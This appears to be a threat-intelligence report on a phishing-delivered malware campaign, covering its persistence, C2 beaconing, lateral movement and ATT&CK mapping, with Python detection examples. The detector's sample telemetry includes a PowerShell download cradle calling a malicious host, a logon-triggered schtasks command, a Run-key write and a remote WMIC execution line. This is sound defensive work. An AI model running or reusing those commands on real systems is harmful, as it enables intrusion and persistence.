Intrusion Analysis of a Sophisticated Malware Campaign Leveraging Phishing and Lateral Movement Techniques

Alex Morgan — Threat Intelligence Analyst

Key Takeaways

  • Initial access came through a phishing campaign that delivered a malicious document attachment by email.
  • After execution, the implant persisted through a logon-triggered scheduled task and an entry in the HKCU Run key.
  • Command and Control (C2) was maintained by periodic beacons to a remote server on TCP 443, with the request content encoded and then encrypted in multiple layers.

Executive Summary

During our investigation, we encountered a malware campaign that relied on phishing email for initial access. The sample was heavily obfuscated and used several independent persistence mechanisms to keep a foothold in the environment.

Initial Access

The threat actor began with a phishing email targeting employees. Its subject line was crafted to get the recipient to open a malicious attachment. The attachment appeared legitimate but carried embedded macros that, once the user enabled them, ran a PowerShell command to download the actual payload. The file path we observed was C:\Users\\AppData\Local\Temp\maliciousdoc.pdf. Note that a genuine PDF cannot carry Office-style macros: a file observed under a .pdf name that executes macros is either an Office document under a misleading name or a PDF using its own active content (embedded JavaScript or launch actions). Which applies here was not determined; confirm the file's true format from its header bytes rather than its extension.

Execution & Persistence

On execution, the PowerShell script decoded an embedded payload written in .NET. This executable, tracked as MalwareX, set up persistence. The actor used the Windows Task Scheduler to register a task that launched the implant at every user logon; its XML definition was found at C:\Windows\System32\Tasks\MyMalwareTask. When collecting this artifact, also export the matching entries under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache, since the task file and the registry cache can be tampered with independently.

The implant also wrote itself into HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run. Entries in this key run when that user logs on (not at system boot), so the two mechanisms fire at the same moment; the duplication means that removing only one of them leaves the foothold intact.

Command and Control

Once the implant was running, it began communicating with the threat actor's command and control server. The traffic was layered: request bodies were encoded and then encrypted to hide their content. The C2 host was identified through DNS queries for malicious-server.com. The implant sent a beacon every 15 minutes as HTTP on TCP 443, the port used for normal HTTPS browsing, so the connections blend with legitimate web traffic. Each request carried encoded payloads containing obfuscated tasking for further activity on the host.
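The fixed 15-minute cadence is the observable that survives whatever encoding or encryption wraps the request content. The following is an added example, not code from the original report: it looks for low-jitter periodic connections in a constructed proxy log. The hostnames WS-0142 and WS-0201, the log format and cdn.example.net are made up; only malicious-server.com comes from the report.

```python
"""Beacon-interval analysis over constructed proxy log records.

Added example, not part of the original report. The log format is a
constructed stand-in for a web proxy export; WS-0142, WS-0201 and
cdn.example.net are made up. Only malicious-server.com is from the report.
"""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample: "<timestamp> <source host> <destination> <dest port>".
# WS-0142 beacons to malicious-server.com roughly every 15 minutes with a
# few seconds of jitter; WS-0201 browses a legitimate CDN at irregular times.
SAMPLE_LOG = """\
2024-03-01T09:00:02Z WS-0142 malicious-server.com 443
2024-03-01T09:03:11Z WS-0201 cdn.example.net 443
2024-03-01T09:15:05Z WS-0142 malicious-server.com 443
2024-03-01T09:21:47Z WS-0201 cdn.example.net 443
2024-03-01T09:30:01Z WS-0142 malicious-server.com 443
2024-03-01T09:44:58Z WS-0142 malicious-server.com 443
2024-03-01T09:52:30Z WS-0201 cdn.example.net 443
2024-03-01T10:00:03Z WS-0142 malicious-server.com 443
2024-03-01T10:14:59Z WS-0142 malicious-server.com 443
2024-03-01T10:31:12Z WS-0201 cdn.example.net 443
"""


def parse_log(text):
    """Yield (timestamp, src, dst, port) tuples from the constructed format."""
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, port = line.split()
        yield datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), src, dst, int(port)


def find_beacons(text, min_events=4, max_jitter_ratio=0.05):
    """Return {(src, dst): mean_interval_seconds} for host pairs whose
    connection inter-arrival times are nearly constant.

    The test is the coefficient of variation (stdev / mean) of the gaps
    between consecutive connections. Human browsing is bursty and irregular;
    an implant sleeping for a fixed period is not, whatever port or
    encryption it uses. min_events keeps one-off bursts from qualifying.
    """
    per_pair = defaultdict(list)
    for ts, src, dst, _port in parse_log(text):
        per_pair[(src, dst)].append(ts)

    hits = {}
    for pair, stamps in per_pair.items():
        if len(stamps) < min_events:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        if avg > 0 and pstdev(gaps) / avg <= max_jitter_ratio:
            hits[pair] = avg
    return hits


if __name__ == "__main__":
    for (src, dst), interval in find_beacons(SAMPLE_LOG).items():
        print(f"{src} -> {dst}: beacon every ~{interval / 60:.1f} min")
```

Run against real proxy or NetFlow exports, the same logic works per (source, destination) pair; raise max_jitter_ratio if the implant adds deliberate sleep jitter, and bucket by destination rather than by source when many hosts talk to the same C2.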

Lateral Movement & Discovery

Our examination of the implant's capabilities showed a clear emphasis on lateral movement. It used WMIC, a built-in Windows utility, and PsExec, the Sysinternals remote execution tool, to enumerate the network and run commands on remote machines. Both leave recognizable traces: WMIC remote execution spawns the target process as a child of WmiPrvSE.exe on the remote host, and PsExec installs the PSEXESVC service there. During this phase the malware also manipulated access tokens, impersonating other logged-on users so that its commands ran in their sessions without additional credentials. In ATT&CK terms this is T1134 – Access Token Manipulation; the original labelling as T1106 – Native API describes the direct Windows API calls used to carry it out rather than the token technique itself.

The implant could also query Active Directory through PowerShell to enumerate machines in the domain, letting the actor identify valuable targets for follow-on activity.

Impact & Objectives

The campaign's primary objective appears to have been data theft. The implant could collect credentials, documents and network configuration data. After moving laterally, the attacker targeted systems holding proprietary information. Network traffic analysis suggested that data was sent to the attacker-controlled C2 server; the volume and content were not confirmed, but the exposure of the organization's intellectual property is a serious risk.

MITRE ATT&CK Mapping

  • T1566.001 – Phishing: Spearphishing Attachment: malicious document delivered by email.
  • T1204.002 – User Execution: Malicious File: the victim opened the attachment and enabled its active content.
  • T1059.001 – Command and Scripting Interpreter: PowerShell: stage-one download and payload decoding.
  • T1105 – Ingress Tool Transfer (formerly named Remote File Copy): PowerShell fetching the .NET payload. PsExec-based lateral movement itself maps to T1569.002 (System Services: Service Execution) and T1021.002 (Remote Services: SMB/Windows Admin Shares).
  • T1053.005 – Scheduled Task/Job: Scheduled Task: MyMalwareTask running at logon.
  • T1547.001 – Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder: the HKCU Run entry.
  • T1071.001 – Application Layer Protocol: Web Protocols: HTTP beacons on TCP 443.
  • T1047 – Windows Management Instrumentation: WMIC for remote discovery and execution.
  • T1134 – Access Token Manipulation: running commands under other users' tokens.
  • T1018 – Remote System Discovery: PowerShell queries against Active Directory for other machines.
  • T1041 – Exfiltration Over C2 Channel: the suspected data leak to the C2 server.

Detection Opportunities

  • Scheduled task creation: alert on Security event 4698 (a scheduled task was created) and on schtasks.exe /create process creations, particularly tasks with a logon trigger that point at a binary under a user profile.
  • Run key persistence: alert on value writes beneath HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run (Sysmon event 13), correlated with the process that performed the write.
  • PowerShell: flag -EncodedCommand invocations and enable Script Block Logging (event 4104), which records the decoded script so download cradles are visible regardless of how the command line was encoded.
  • Network: alert on outbound connections to known-malicious domains and on fixed-interval connections to previously unseen hosts; a regular 15-minute cadence stands out even when the content is encrypted.
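The host-side detections above, together with the persistence and lateral movement behaviour described earlier, can be expressed as a small rule set. The following is an added example, not code from the original report. It runs over constructed, Sysmon-style event records: the task name MyMalwareTask, the Run key and malicious-server.com come from the report; the user name jdoe, the value name Updater, the host FS-01 and the encoded script are made up for the example.

```python
"""Detection rules for the persistence, PowerShell and remote execution
behaviour this report describes, run over constructed endpoint telemetry.

Added example, not code from the original report. Events are simplified
Sysmon-style dictionaries (ProcessCreate ~ event 1, RegistryValueSet ~ event
13). MyMalwareTask, the Run key path and malicious-server.com are from the
report; jdoe, Updater, FS-01 and the encoded script are constructed.
"""
import base64
import re

# Strings that turn "some encoded PowerShell" into "download-and-execute".
CRADLE_TOKENS = ("downloadstring", "downloadfile", "net.webclient",
                 "iex", "invoke-expression", "frombase64string")
# Sysmon records HKCU as HKU\<SID>, so match on the key path, not the hive.
# The prefix match also catches RunOnce, which is persistence as well.
RUN_KEY = r"\software\microsoft\windows\currentversion\run"
# -EncodedCommand and the abbreviations powershell.exe accepts for it.
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def _enc(script):
    """Encode a script the way -EncodedCommand expects: base64 of UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


SAMPLE_EVENTS = [  # constructed telemetry
    {"type": "ProcessCreate",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -EncodedCommand " + _enc(
         "IEX (New-Object Net.WebClient).DownloadString('https://malicious-server.com/a')")},
    {"type": "ProcessCreate", "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r"schtasks.exe /create /tn MyMalwareTask /sc onlogon "
                r"/tr C:\Users\jdoe\AppData\Local\Temp\implant.exe"},
    {"type": "RegistryValueSet",
     "target": r"HKU\S-1-5-21-1111\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "details": r"C:\Users\jdoe\AppData\Local\Temp\implant.exe"},
    {"type": "ProcessCreate", "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": 'wmic /node:FS-01 process call create "cmd.exe /c whoami"'},
    {"type": "ProcessCreate",  # benign admin script: must not alert
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"},
]


def decode_encoded_command(cmdline):
    """Return the decoded script of an -EncodedCommand invocation, or None
    when the command line has no such flag or the payload is not valid."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def evaluate(event):
    """Return the (rule, detail) pairs a single event triggers."""
    alerts = []
    if event["type"] == "ProcessCreate":
        image, cmd = event["image"].lower(), event["cmdline"]
        low = cmd.lower()
        if image.endswith("\\schtasks.exe") and "/create" in low:
            alerts.append(("scheduled_task_created", cmd))
        if image.endswith(("\\powershell.exe", "\\pwsh.exe")):
            decoded = decode_encoded_command(cmd)
            if decoded is not None:
                # Encoding alone is common in legitimate tooling; the decoded
                # script doing a download-and-execute is the strong signal.
                hit = any(tok in decoded.lower() for tok in CRADLE_TOKENS)
                alerts.append(("download_cradle" if hit else "encoded_command", decoded))
        if image.endswith("\\wmic.exe") and "/node:" in low and "process call create" in low:
            alerts.append(("remote_wmi_exec", cmd))
    elif event["type"] == "RegistryValueSet" and RUN_KEY in event["target"].lower():
        alerts.append(("run_key_persistence", f"{event['target']} = {event['details']}"))
    return alerts


def scan(events):
    """Run every rule over every event; returns (index, rule, detail) triples."""
    return [(i, rule, detail) for i, ev in enumerate(events) for rule, detail in evaluate(ev)]


if __name__ == "__main__":
    for idx, rule, detail in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}: {detail[:80]}")
```

The decode step matters more than the flag match: Script Block Logging (event 4104) gives the same decoded text on the endpoint, but in environments without it, decoding the command line from process creation events is the only way to separate an administrator's encoded one-liner from a download cradle.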

Analyst Notes

This investigation highlights the value of user training on phishing and of robust endpoint security. Because the attack chained a malicious attachment, PowerShell execution, two logon-time persistence mechanisms and periodic beaconing, continuous monitoring and anomaly detection at each of those stages give defenders several independent chances to catch a similar intrusion early.
